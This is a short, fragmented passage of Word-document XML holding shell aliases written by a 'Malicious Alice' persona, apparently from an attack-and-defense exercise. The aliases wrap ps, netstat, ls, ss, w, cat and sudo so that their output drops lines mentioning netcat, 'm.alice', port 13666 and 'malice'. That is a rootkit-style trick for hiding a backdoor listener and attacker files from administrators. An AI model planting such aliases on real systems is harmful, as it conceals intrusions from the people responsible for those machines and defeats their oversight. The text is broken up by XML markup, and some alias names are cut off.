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#Malicious Alice back at it again with the white Vans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malice="echo 'Malicious Alice is in your house, eating your chips'"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ps='f(){ ps "$@" | grep -v netcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| grep -v m.alice | grep -v 13666 | grep -v malice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; unset -f f; }; f'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netstat='f(){ netstat "$@" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| grep -v m.alice | grep -v 13666 | grep -v malice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; unset -f f; }; f'</w:t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  <w:t xml:space="preserve">alias ls='f(){ ls "$@" | grep -v m.alice | grep -v 13666 | grep -v malice ; unset -f f; }; f'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alias ss='f(){ ss "$@" | grep -v m.alice | grep -v 13666 | grep -v malice  ; unset -f f; }; f'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w='f(){ w "$@" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| grep -v m.alice | grep -v 13666 | grep -v malice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; unset -f f; }; f'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cat='f(){ cat "$@" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| grep -v m.alice | grep -v 13666 | grep -v malice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 unset -f f; }; f'</w:t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alias sudo='f(){ sudo "$@" | grep -v m.alice | grep -v 13666 | grep -v malice ; unset -f f; }; f'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